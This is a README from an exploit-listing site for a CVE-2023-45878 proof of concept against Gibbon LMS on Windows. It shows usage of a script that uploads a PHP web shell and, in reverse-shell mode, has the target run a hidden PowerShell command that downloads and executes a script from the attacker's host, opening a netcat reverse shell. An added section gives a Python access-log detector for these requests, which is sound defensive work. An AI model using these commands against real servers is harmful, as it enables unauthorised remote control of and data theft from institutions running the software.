## https://sploitus.com/exploit?id=B9C9A654-821F-5450-BD25-49C6C09C3224
# CVE-2023-45878-POC
CVE-2023-45878 PoC for Gibbon LMS running under XAMPP on Windows.
It uploads a web shell named shell.php, which is used for command injection.
In reverse-shell mode it also writes a PowerShell reverse shell script, shell.ps1, which is delivered to the target machine through shell.php.
# Requirements
Python3
Requests python3 module
netcat
```
pip3 install requests
```
## Virtual env
```shell
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests
```
# Usage
Tested against Gibbon LMS running under XAMPP on Windows with no AV enabled.
The target URL can be taken from the Gibbon login page, for example http://gibbon-example/Gibbon-LMS/
## Reverse shell
```shell
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT
```
### Result
```text
[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP
PS C:\xampp\htdocs\Gibbon-LMS>
```
## Single command
```shell
python3 reverse.py --single -target_url http://target -command whoami
```
### Result
```text
[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice
```
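For defenders, the requests shown in the two result blocks above leave a recognisable trail in the web server's access log. The following is an added detection example, not part of this PoC repository; it assumes an Apache access log in common/combined format, and the sample log lines and client addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined log prefix (assumed format of the XAMPP access.log).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators taken from the PoC output above, matched after URL-decoding.
INDICATORS = {
    "powershell-invocation": re.compile(r"\bpowershell(\.exe)?\b", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "download-cradle": re.compile(r"IEX\b.*DownloadString", re.I),
}
WEBSHELL_NAME = "shell.php"  # file name the PoC uploads

def inspect_line(line):
    """Return a finding for a suspicious PHP request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["uri"].partition("?")
    if not path.lower().endswith(".php"):
        return None
    decoded = unquote_plus(unquote_plus(query))  # tolerate double encoding
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if path.rsplit("/", 1)[-1].lower() == WEBSHELL_NAME:
        hits.append("poc-webshell-name")
    if not hits:
        return None
    return {"client": m["client"], "time": m["ts"], "path": path,
            "status": int(m["status"]), "hits": sorted(hits), "query": decoded}

def scan(lines):
    """Inspect every log line and return the findings in input order."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log; the second entry reuses the request from the PoC output.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Mar/2025:12:58:01 +0000] "GET /Gibbon-LMS/index.php?q=login HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Mar/2025:12:59:10 +0000] "GET /shell.php?cmd=powershell%20-nop%20-w%20hidden'
    '%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1'
    '%27%29 HTTP/1.1" 200 -',
    '198.51.100.7 - - [20/Mar/2025:13:02:44 +0000] "GET /shell.php?whoami HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["time"], finding["client"], finding["path"], finding["hits"])
```

The file-name hit alone is a weak signal, since the name is trivial to change; the decoded-query indicators apply to any PHP path.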
# Credits
https://herolab.usd.de/security-advisories/usd-2023-0025/